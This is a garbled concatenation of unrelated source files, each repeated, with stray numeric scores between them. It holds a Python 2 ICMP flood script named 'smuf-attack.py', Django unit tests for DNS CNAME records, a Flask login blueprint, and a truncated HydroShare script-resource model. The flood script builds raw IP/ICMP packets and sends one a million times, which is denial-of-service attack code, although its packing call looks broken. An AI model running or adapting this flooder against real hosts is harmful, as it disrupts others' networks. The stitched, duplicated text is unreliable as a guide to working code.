icmp_type = 128 # Icmp包的类型及代码 类型8 代码0
icmp_checksum = 0 # icmp包校验和
icmp_id = 0 # Icmp包标识符
icmp_seq = 0 # ICMP包的序列号
# 按上面描述的结构,构建icmp_header。
icmp_header = pack('!HHHH' , icmp_type, icmp_checksum, icmp_id)
# 写点东西作为data部分(可选)
payload_data = 'wordpress.youran.me'
# 构建pseudo ip header
psh_saddr = ip_saddr
psh_daddr = ip_daddr
psh_reserved = 0
psh_protocol = ip_protocol
psh_tcp_len = len(icmp_header) + len(payload_data)
psh = pack('!4s4sBBH', psh_saddr, psh_daddr, psh_reserved, psh_protocol, psh_tcp_len)
# 创建最终用于checksum的内容
chk = psh + icmp_header + payload_data
# 必要时追加1字节的padding
if len(chk) % 2 != 0:
chk += '\0'
icmp_checksum = checksum(chk)
# 重新构建tcp_header,把checksum结果填进去
icmp_header = pack('!HHHH' , icmp_type, icmp_checksum, icmp_id)
# 最终的tcp/ip packet!
packet = ip_header + icmp_header + payload_data
# 发送出去
i = 0
while True:
i = i+1
s.sendto(packet, (ip_dest, 0))
if i ==1000000:
break
© 2018 GitHub, Inc. | attack/smuf-attack.py | import sys, socket
from struct import *
def carry_around_add(a, b):
c = a + b
return (c & 0xffff) + (c >> 16)
def checksum(msg):
s = 0
for i in range(0, len(msg), 2):
w = (ord(msg[i]) << 8 ) + ord(msg[i+1])
s = carry_around_add(s, w)
return ~s & 0xffff
try:
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
except socket.error,msg:
print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
ip_source = '127.0.0.1' #本机IP
ip_dest = '127.0.0.1' #也可以用域名:socket.gethostbyname('www.microsoft.com')
#填写ip header
ip_ver = 4 # ipv4
ip_ihl = 5 # Header Length =5, 表示无options部分
ip_dscp = 0 # 以前叫tos,现在叫dscp
ip_total_len = 0 # left for kernel to fill
ip_id = 22222 # fragment相关,随便写个
ip_frag_offset = 0 # fragment相关
ip_ttl = 255 # *nix下TTL一般是255
ip_protocol = socket.IPPROTO_ICMP # 表示后面接的是tcp数据
ip_checksum = 0 # left for kernel to fill
ip_saddr = socket.inet_pton(socket.AF_INET, ip_source) # 两边的ip地址
ip_daddr = socket.inet_pton(socket.AF_INET, ip_dest)
ip_ver_ihl = (ip_ver << 4) + ip_ihl # 俩4-bit数据合并成一个字节
# 按上面描述的结构,构建ip header。
ip_header = pack('!BBHHHBBH4s4s' , ip_ver_ihl, ip_dscp, ip_total_len, ip_id, ip_frag_offset, ip_ttl, ip_protocol, ip_checksum, ip_saddr, ip_daddr)
icmp_type = 128 # Icmp包的类型及代码 类型8 代码0
icmp_checksum = 0 # icmp包校验和
icmp_id = 0 # Icmp包标识符
icmp_seq = 0 # ICMP包的序列号
# 按上面描述的结构,构建icmp_header。
icmp_header = pack('!HHHH' , icmp_type, icmp_checksum, icmp_id)
# 写点东西作为data部分(可选)
payload_data = 'wordpress.youran.me'
# 构建pseudo ip header
psh_saddr = ip_saddr
psh_daddr = ip_daddr
psh_reserved = 0
psh_protocol = ip_protocol
psh_tcp_len = len(icmp_header) + len(payload_data)
psh = pack('!4s4sBBH', psh_saddr, psh_daddr, psh_reserved, psh_protocol, psh_tcp_len)
# 创建最终用于checksum的内容
chk = psh + icmp_header + payload_data
# 必要时追加1字节的padding
if len(chk) % 2 != 0:
chk += '\0'
icmp_checksum = checksum(chk)
# 重新构建tcp_header,把checksum结果填进去
icmp_header = pack('!HHHH' , icmp_type, icmp_checksum, icmp_id)
# 最终的tcp/ip packet!
packet = ip_header + icmp_header + payload_data
# 发送出去
i = 0
while True:
i = i+1
s.sendto(packet, (ip_dest, 0))
if i ==1000000:
break
© 2018 GitHub, Inc. | 0.070901 | 0.078607 |
from django.core.exceptions import ValidationError
import cyder.base.tests
from cyder.cydns.domain.models import Domain
from cyder.cydns.nameserver.models import Nameserver
from cyder.cydns.mx.models import MX
from cyder.cydns.srv.models import SRV
from cyder.cydns.txt.models import TXT
from cyder.cydns.ptr.models import PTR
from cyder.cydns.cname.models import CNAME
from cyder.cydns.address_record.models import AddressRecord
from cyder.cydhcp.interface.static_intr.models import StaticInterface
from cyder.cydns.ip.utils import ip_to_domain_name
from cyder.cydns.tests.utils import create_fake_zone
from cyder.core.system.models import System
class CNAMETests(cyder.base.tests.TestCase):
def create_domain(self, name, ip_type=None, delegated=False):
if ip_type is None:
ip_type = '4'
if name in ('arpa', 'in-addr.arpa', 'ip6.arpa'):
pass
else:
name = ip_to_domain_name(name, ip_type=ip_type)
d = Domain(name=name, delegated=delegated)
d.clean()
self.assertTrue(d.is_reverse)
return d
def setUp(self):
self.g = create_fake_zone("gz", suffix="")
self.c_g = create_fake_zone("coo.gz", suffix="")
self.d = create_fake_zone("dz", suffix="")
self.r1 = create_fake_zone("10.in-addr.arpa", suffix="")
self.r1.save()
self.s = System()
self.s.save()
def do_add(self, label, domain, data):
cn = CNAME(label=label, domain=domain, target=data)
cn.full_clean()
cn.save()
cn.save()
self.assertTrue(cn.details())
cs = CNAME.objects.filter(
label=label, domain=domain, target=data)
self.assertEqual(len(cs), 1)
return cn
def test_add(self):
label = "foo"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
label = "boo"
domain = self.c_g
data = "foo.foo.com"
self.do_add(label, domain, data)
label = "fo1"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
self.assertRaises(ValidationError, self.do_add, *(label, domain, data))
label = "hooo"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
def test1_add_glob(self):
label = "*foo"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
label = "*"
domain = self.c_g
data = "foo.foo.com"
self.do_add(label, domain, data)
label = "*.fo1"
domain = self.g
data = "foo.com"
self.assertRaises(ValidationError, self.do_add, *(label, domain, data))
label = "*sadfasfd-asdf"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
def test2_add_glob(self):
label = "*coo"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
label = "*"
domain = self.c_g
data = "foo.com"
self.do_add(label, domain, data)
def test_soa_condition(self):
label = ""
domain = self.c_g
data = "foo.com"
self.assertRaises(ValidationError, self.do_add, *(label, domain, data))
def test_add_bad(self):
label = ""
domain = self.g
data = "..foo.com"
self.assertRaises(ValidationError, self.do_add, *(label, domain, data))
def test_add_mx_with_cname(self):
label = "cnamederp1"
domain = self.c_g
data = "foo.com"
fqdn = label + '.' + domain.name
mx_data = {'label': '', 'domain': self.c_g, 'server':
fqdn, 'priority': 2, 'ttl': 2222}
mx = MX(**mx_data)
mx.save()
cn = CNAME(label=label, domain=domain, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_address_record_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec, _ = AddressRecord.objects.get_or_create(
label=label, domain=dom, ip_type='4', ip_str="172.16.58.3")
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_address_record_exists_upper_case(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec, _ = AddressRecord.objects.get_or_create(
label=label, domain=dom, ip_type='4', ip_str="172.16.58.3")
cn = CNAME(label=label.title(), domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_address_record_cname_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
CNAME.objects.get_or_create(
label=label, domain=dom, target=data
)
rec = AddressRecord(label=label, domain=dom, ip_str="172.16.58.3")
self.assertRaises(ValidationError, rec.save)
def test_srv_exists(self):
label = "_testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec, _ = SRV.objects.get_or_create(
label=label, domain=dom, target="asdf",
port=2, priority=2, weight=4)
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_srv_cname_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
CNAME.objects.get_or_create(
label=label, domain=dom, target=data)
rec = SRV(label=label, domain=dom, target="asdf",
port=2, priority=2, weight=4)
self.assertRaises(ValidationError, rec.save)
def test_txt_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec, _ = TXT.objects.get_or_create(
label=label, domain=dom, txt_data="asdf")
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_txt_cname_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn, _ = CNAME.objects.get_or_create(
label=label, domain=dom, target=data)
cn.full_clean()
cn.save()
rec = TXT(label=label, domain=dom, txt_data="asdf1")
self.assertRaises(ValidationError, rec.save)
def test_mx_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec, _ = MX.objects.get_or_create(
label=label, domain=dom, server="asdf",
priority=123, ttl=123)
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_mx_cname_exists(self):
# Duplicate test?
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn, _ = CNAME.objects.get_or_create(
label=label, domain=dom, target=data)
cn.full_clean()
cn.save()
rec = MX(label=label, domain=dom, server="asdf1",
priority=123, ttl=123)
self.assertRaises(ValidationError, rec.save)
def test_ns_exists(self):
# Duplicate test?
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec = Nameserver(domain=dom, server="asdf1")
rec.save()
cn = CNAME(label='', domain=dom, target=data)
self.assertRaises(ValidationError, cn.clean)
def test_ns_cname_exists(self):
# Duplicate test?
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn, _ = CNAME.objects.get_or_create(
label='', domain=dom, target=data)
cn.full_clean()
cn.save()
rec = Nameserver(domain=dom, server="asdf1")
self.assertRaises(ValidationError, rec.save)
def test_intr_exists(self):
label = "tdfestyfoo"
data = "waasdft"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
intr = StaticInterface(label=label, domain=dom, ip_str="10.0.0.1",
ip_type='4', system=self.s,
mac="11:22:33:44:55:66")
intr.clean()
intr.save()
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_intr_cname_exists(self):
# Duplicate test?
label = "tesafstyfoo"
data = "wadfakt"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn, _ = CNAME.objects.get_or_create(
label=label, domain=dom, target=data)
cn.full_clean()
cn.save()
intr = StaticInterface(
label=label, domain=dom, ip_str="10.0.0.2", ip_type='4',
system=self.s, mac="00:11:22:33:44:55"
)
self.assertRaises(ValidationError, intr.clean)
cn.label = "differentlabel"
cn.save()
intr.clean()
intr.save()
def test_ptr_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec = PTR(ip_str="10.193.1.1", ip_type='4', name='testyfoo.what.cd')
rec.full_clean()
rec.save()
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_ptr_cname_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
CNAME.objects.get_or_create(label=label, domain=dom, target=data)
rec = PTR(ip_str="10.193.1.1", ip_type='4', name='testyfoo.what.cd')
self.assertRaises(ValidationError, rec.clean)
def test_cname_point_to_itself(self):
label = "foopy"
data = "foopy.what.cd"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.clean) | cyder/cydns/cname/tests/test_models.py | from django.core.exceptions import ValidationError
import cyder.base.tests
from cyder.cydns.domain.models import Domain
from cyder.cydns.nameserver.models import Nameserver
from cyder.cydns.mx.models import MX
from cyder.cydns.srv.models import SRV
from cyder.cydns.txt.models import TXT
from cyder.cydns.ptr.models import PTR
from cyder.cydns.cname.models import CNAME
from cyder.cydns.address_record.models import AddressRecord
from cyder.cydhcp.interface.static_intr.models import StaticInterface
from cyder.cydns.ip.utils import ip_to_domain_name
from cyder.cydns.tests.utils import create_fake_zone
from cyder.core.system.models import System
class CNAMETests(cyder.base.tests.TestCase):
def create_domain(self, name, ip_type=None, delegated=False):
if ip_type is None:
ip_type = '4'
if name in ('arpa', 'in-addr.arpa', 'ip6.arpa'):
pass
else:
name = ip_to_domain_name(name, ip_type=ip_type)
d = Domain(name=name, delegated=delegated)
d.clean()
self.assertTrue(d.is_reverse)
return d
def setUp(self):
self.g = create_fake_zone("gz", suffix="")
self.c_g = create_fake_zone("coo.gz", suffix="")
self.d = create_fake_zone("dz", suffix="")
self.r1 = create_fake_zone("10.in-addr.arpa", suffix="")
self.r1.save()
self.s = System()
self.s.save()
def do_add(self, label, domain, data):
cn = CNAME(label=label, domain=domain, target=data)
cn.full_clean()
cn.save()
cn.save()
self.assertTrue(cn.details())
cs = CNAME.objects.filter(
label=label, domain=domain, target=data)
self.assertEqual(len(cs), 1)
return cn
def test_add(self):
label = "foo"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
label = "boo"
domain = self.c_g
data = "foo.foo.com"
self.do_add(label, domain, data)
label = "fo1"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
self.assertRaises(ValidationError, self.do_add, *(label, domain, data))
label = "hooo"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
def test1_add_glob(self):
label = "*foo"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
label = "*"
domain = self.c_g
data = "foo.foo.com"
self.do_add(label, domain, data)
label = "*.fo1"
domain = self.g
data = "foo.com"
self.assertRaises(ValidationError, self.do_add, *(label, domain, data))
label = "*sadfasfd-asdf"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
def test2_add_glob(self):
label = "*coo"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
label = "*"
domain = self.c_g
data = "foo.com"
self.do_add(label, domain, data)
def test_soa_condition(self):
label = ""
domain = self.c_g
data = "foo.com"
self.assertRaises(ValidationError, self.do_add, *(label, domain, data))
def test_add_bad(self):
label = ""
domain = self.g
data = "..foo.com"
self.assertRaises(ValidationError, self.do_add, *(label, domain, data))
def test_add_mx_with_cname(self):
label = "cnamederp1"
domain = self.c_g
data = "foo.com"
fqdn = label + '.' + domain.name
mx_data = {'label': '', 'domain': self.c_g, 'server':
fqdn, 'priority': 2, 'ttl': 2222}
mx = MX(**mx_data)
mx.save()
cn = CNAME(label=label, domain=domain, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_address_record_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec, _ = AddressRecord.objects.get_or_create(
label=label, domain=dom, ip_type='4', ip_str="172.16.58.3")
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_address_record_exists_upper_case(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec, _ = AddressRecord.objects.get_or_create(
label=label, domain=dom, ip_type='4', ip_str="172.16.58.3")
cn = CNAME(label=label.title(), domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_address_record_cname_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
CNAME.objects.get_or_create(
label=label, domain=dom, target=data
)
rec = AddressRecord(label=label, domain=dom, ip_str="172.16.58.3")
self.assertRaises(ValidationError, rec.save)
def test_srv_exists(self):
label = "_testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec, _ = SRV.objects.get_or_create(
label=label, domain=dom, target="asdf",
port=2, priority=2, weight=4)
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_srv_cname_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
CNAME.objects.get_or_create(
label=label, domain=dom, target=data)
rec = SRV(label=label, domain=dom, target="asdf",
port=2, priority=2, weight=4)
self.assertRaises(ValidationError, rec.save)
def test_txt_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec, _ = TXT.objects.get_or_create(
label=label, domain=dom, txt_data="asdf")
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_txt_cname_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn, _ = CNAME.objects.get_or_create(
label=label, domain=dom, target=data)
cn.full_clean()
cn.save()
rec = TXT(label=label, domain=dom, txt_data="asdf1")
self.assertRaises(ValidationError, rec.save)
def test_mx_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec, _ = MX.objects.get_or_create(
label=label, domain=dom, server="asdf",
priority=123, ttl=123)
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_mx_cname_exists(self):
# Duplicate test?
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn, _ = CNAME.objects.get_or_create(
label=label, domain=dom, target=data)
cn.full_clean()
cn.save()
rec = MX(label=label, domain=dom, server="asdf1",
priority=123, ttl=123)
self.assertRaises(ValidationError, rec.save)
def test_ns_exists(self):
# Duplicate test?
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec = Nameserver(domain=dom, server="asdf1")
rec.save()
cn = CNAME(label='', domain=dom, target=data)
self.assertRaises(ValidationError, cn.clean)
def test_ns_cname_exists(self):
# Duplicate test?
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn, _ = CNAME.objects.get_or_create(
label='', domain=dom, target=data)
cn.full_clean()
cn.save()
rec = Nameserver(domain=dom, server="asdf1")
self.assertRaises(ValidationError, rec.save)
def test_intr_exists(self):
label = "tdfestyfoo"
data = "waasdft"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
intr = StaticInterface(label=label, domain=dom, ip_str="10.0.0.1",
ip_type='4', system=self.s,
mac="11:22:33:44:55:66")
intr.clean()
intr.save()
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_intr_cname_exists(self):
# Duplicate test?
label = "tesafstyfoo"
data = "wadfakt"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn, _ = CNAME.objects.get_or_create(
label=label, domain=dom, target=data)
cn.full_clean()
cn.save()
intr = StaticInterface(
label=label, domain=dom, ip_str="10.0.0.2", ip_type='4',
system=self.s, mac="00:11:22:33:44:55"
)
self.assertRaises(ValidationError, intr.clean)
cn.label = "differentlabel"
cn.save()
intr.clean()
intr.save()
def test_ptr_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec = PTR(ip_str="10.193.1.1", ip_type='4', name='testyfoo.what.cd')
rec.full_clean()
rec.save()
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_ptr_cname_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
CNAME.objects.get_or_create(label=label, domain=dom, target=data)
rec = PTR(ip_str="10.193.1.1", ip_type='4', name='testyfoo.what.cd')
self.assertRaises(ValidationError, rec.clean)
def test_cname_point_to_itself(self):
label = "foopy"
data = "foopy.what.cd"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.clean) | 0.624523 | 0.283918 |
from flask import render_template, request, redirect, session, Blueprint
import uuid
from crud import client
from crud import producer
app = Blueprint("login", "app")
@app.route('/', methods=['GET', 'POST'])
def index():
if "cpf" in session:
return redirect("/main")
elif "cnpj" in session:
return render_template("main_producer.html")
else:
return render_template("index.html")
@app.route('/access', methods=['GET', 'POST'])
def access():
if request.method == 'POST':
if request.form['index'] == "Login":
try:
CPF = request.form['CPF']
password = request.form['password']
login_approve = client.read(CPF, password)
for rows in login_approve:
session_cpf = rows[1]
session_id = rows[0]
if session_cpf != None:
session['cpf'] = session_cpf
session['uuid'] = str(uuid.uuid4())
session['id'] = session_id
else:
print("Don't have credentials")
return redirect("/main")
except Exception as e:
return render_template("index_denied.html")
elif request.form['index'] == "Registrar":
return render_template("register.html")
else:
return render_template("producer_login.html")
@app.route('/access_producer', methods=['GET', 'POST'])
def access_producer():
if request.method == 'POST':
if request.form['index'] == "Login":
try:
CNPJ = request.form['CNPJ']
password = request.form['password']
login_approve = producer.read(CNPJ, password)
for rows in login_approve:
session_cnpj = rows[1]
session_id = rows[0]
if session_cnpj != None:
session['cnpj'] = session_cnpj
session['id'] = session_id
else:
print("Don't have credentials")
return render_template("main_producer.html")
except Exception as e:
return render_template("producer_login_denied.html")
else:
return render_template("register_producer.html")
@app.route('/logout')
def logout():
session.pop('cpf', None)
session.pop('cnpj', None)
session.pop('id', None)
session.pop('uuid', None)
return redirect("/", code=302) | api/login.py | from flask import render_template, request, redirect, session, Blueprint
import uuid
from crud import client
from crud import producer
app = Blueprint("login", "app")
@app.route('/', methods=['GET', 'POST'])
def index():
if "cpf" in session:
return redirect("/main")
elif "cnpj" in session:
return render_template("main_producer.html")
else:
return render_template("index.html")
@app.route('/access', methods=['GET', 'POST'])
def access():
if request.method == 'POST':
if request.form['index'] == "Login":
try:
CPF = request.form['CPF']
password = request.form['password']
login_approve = client.read(CPF, password)
for rows in login_approve:
session_cpf = rows[1]
session_id = rows[0]
if session_cpf != None:
session['cpf'] = session_cpf
session['uuid'] = str(uuid.uuid4())
session['id'] = session_id
else:
print("Don't have credentials")
return redirect("/main")
except Exception as e:
return render_template("index_denied.html")
elif request.form['index'] == "Registrar":
return render_template("register.html")
else:
return render_template("producer_login.html")
@app.route('/access_producer', methods=['GET', 'POST'])
def access_producer():
if request.method == 'POST':
if request.form['index'] == "Login":
try:
CNPJ = request.form['CNPJ']
password = request.form['password']
login_approve = producer.read(CNPJ, password)
for rows in login_approve:
session_cnpj = rows[1]
session_id = rows[0]
if session_cnpj != None:
session['cnpj'] = session_cnpj
session['id'] = session_id
else:
print("Don't have credentials")
return render_template("main_producer.html")
except Exception as e:
return render_template("producer_login_denied.html")
else:
return render_template("register_producer.html")
@app.route('/logout')
def logout():
session.pop('cpf', None)
session.pop('cnpj', None)
session.pop('id', None)
session.pop('uuid', None)
return redirect("/", code=302) | 0.249082 | 0.052207 |
from django.db import models, transaction
from django.contrib.contenttypes.fields import GenericRelation
from django.core.exceptions import ValidationError
from mezzanine.pages.page_processors import processor_for
from hs_core.models import BaseResource, ResourceManager, resource_processor, CoreMetaData, \
AbstractMetaDataElement
# TODO Deprecated
class ScriptResource(BaseResource):
objects = ResourceManager('ScriptResource')
discovery_content_type = 'Script' # used during discovery
class Meta:
proxy = True
verbose_name = 'Script Resource'
@classmethod
def get_supported_upload_file_types(cls):
# one file type is supported
return ".r", ".py", ".m"
@classmethod
def get_metadata_class(cls):
return ScriptMetaData
processor_for(ScriptResource)(resource_processor)
class ScriptSpecificMetadata(AbstractMetaDataElement):
term = "ScriptSpecificMetadata"
# program language
scriptLanguage = models.CharField(verbose_name='Programming Language', blank=True, max_length=100, default='R',
help_text='The programming language that the script is written in')
# language version
languageVersion = models.CharField(verbose_name='Programming Language Version', blank=True, max_length=255,
help_text='The software version of the script')
# script version
scriptVersion = models.CharField(verbose_name='Script Version', max_length=255, blank=True, default='1.0',
help_text='The software version or build number of the script')
# dependencies
scriptDependencies = models.CharField(verbose_name='Dependencies', blank=True, max_length=400,
help_text='Dependencies for the script (externally-imported packages)')
# release date
scriptReleaseDate = models.DateTimeField(verbose_name='Release Date', null=True, blank=True,
help_text='The date that this version of the script was released')
# repository
scriptCodeRepository = models.URLField(verbose_name='Script Repository', blank=True, max_length=255,
help_text='A URL to the source code repository (e.g. git, mercurial, svn)')
class Meta:
# ScriptSpecificMetadata element is not repeatable
unique_together = ("content_type", "object_id")
class ScriptMetaData(CoreMetaData):
scriptspecificmetadata = GenericRelation(ScriptSpecificMetadata)
@property
def resource(self):
return ScriptResource.objects.filter(object_id=self.id).first()
@property
def program(self):
return self.scriptspecificmetadata.all().first()
@property
def script_specific_metadata(self):
return self.program
@property
def serializer(self):
"""Return an instance of rest_framework Serializer for self """
from .serializers import ScriptMetaDataSerializer
return ScriptMetaDataSerializer(self)
@classmethod
def parse_for_bulk_update(cls, metadata, parsed_metadata):
"""Overriding the base class method"""
CoreMetaData.parse_for_bulk_update(metadata, parsed_metadata)
keys_to_update = list(metadata.keys())
if 'scriptspecificmetadata' in keys_to_update:
parsed_metadata.append({"scriptspecificmetadata":
metadata.pop('scriptspecificmetadata')})
@classmethod
def get_supported_element_names(cls):
elements = super(ScriptMetaData, cls).get_supported_element_names()
elements.append('ScriptSpecificMetadata')
return elements
def has_all_required_elements(self):
if self.get_required_missing_elements():
return False
return True
def get_required_missing_elements(self): # show missing required meta
missing_required_elements = super(ScriptMetaData, self).get_required_missing_elements()
if not self.program:
missing_required_elements.append('Script Language')
missing_required_elements.append('Programming Language Version')
else:
if not self.program.scriptLanguage:
missing_required_elements.append('Script Language')
if not self.program.languageVersion:
missing_required_elements.append('Programming Language Version')
return missing_required_elements
def update(self, metadata, user):
# overriding the base class update method for bulk update of metadata
from .forms import ScriptFormValidation
super(ScriptMetaData, self).update(metadata, user)
attribute_mappings = {'scriptspecificmetadata': 'program'}
with transaction.atomic():
# update/create non-repeatable element
for element_name in list(attribute_mappings.keys()):
for dict_item in metadata:
if element_name in dict_item:
validation_form = ScriptFormValidation(dict_item[element_name])
if not validation_form.is_valid():
err_string = self.get_form_errors_as_string(validation_form)
raise ValidationError(err_string)
element_property_name = attribute_mappings[element_name]
self.update_non_repeatable_element(element_name, metadata,
element_property_name)
break
from . import receivers # never delete this otherwise none of the receiver function will work | hs_script_resource/models.py | from django.db import models, transaction
from django.contrib.contenttypes.fields import GenericRelation
from django.core.exceptions import ValidationError
from mezzanine.pages.page_processors import processor_for
from hs_core.models import BaseResource, ResourceManager, resource_processor, CoreMetaData, \
AbstractMetaDataElement
# TODO Deprecated
class ScriptResource(BaseResource):
objects = ResourceManager('ScriptResource')
discovery_content_type = 'Script' # used during discovery
class Meta:
proxy = True
verbose_name = 'Script Resource'
@classmethod
def get_supported_upload_file_types(cls):
# one file type is supported
return ".r", ".py", ".m"
@classmethod
def get_metadata_class(cls):
return ScriptMetaData
processor_for(ScriptResource)(resource_processor)
class ScriptSpecificMetadata(AbstractMetaDataElement):
term = "ScriptSpecificMetadata"
# program language
scriptLanguage = models.CharField(verbose_name='Programming Language', blank=True, max_length=100, default='R',
help_text='The programming language that the script is written in')
# language version
languageVersion = models.CharField(verbose_name='Programming Language Version', blank=True, max_length=255,
help_text='The software version of the script')
# script version
scriptVersion = models.CharField(verbose_name='Script Version', max_length=255, blank=True, default='1.0',
help_text='The software version or build number of the script')
# dependencies
scriptDependencies = models.CharField(verbose_name='Dependencies', blank=True, max_length=400,
help_text='Dependencies for the script (externally-imported packages)')
# release date
scriptReleaseDate = models.DateTimeField(verbose_name='Release Date', null=True, blank=True,
help_text='The date that this version of the script was released')
# repository
scriptCodeRepository = models.URLField(verbose_name='Script Repository', blank=True, max_length=255,
help_text='A URL to the source code repository (e.g. git, mercurial, svn)')
class Meta:
# ScriptSpecificMetadata element is not repeatable
unique_together = ("content_type", "object_id")
class ScriptMetaData(CoreMetaData):
scriptspecificmetadata = GenericRelation(ScriptSpecificMetadata)
@property
def resource(self):
return ScriptResource.objects.filter(object_id=self.id).first()
@property
def program(self):
return self.scriptspecificmetadata.all().first()
@property
def script_specific_metadata(self):
return self.program
@property
def serializer(self):
"""Return an instance of rest_framework Serializer for self """
from .serializers import ScriptMetaDataSerializer
return ScriptMetaDataSerializer(self)
@classmethod
def parse_for_bulk_update(cls, metadata, parsed_metadata):
"""Overriding the base class method"""
CoreMetaData.parse_for_bulk_update(metadata, parsed_metadata)
keys_to_update = list(metadata.keys())
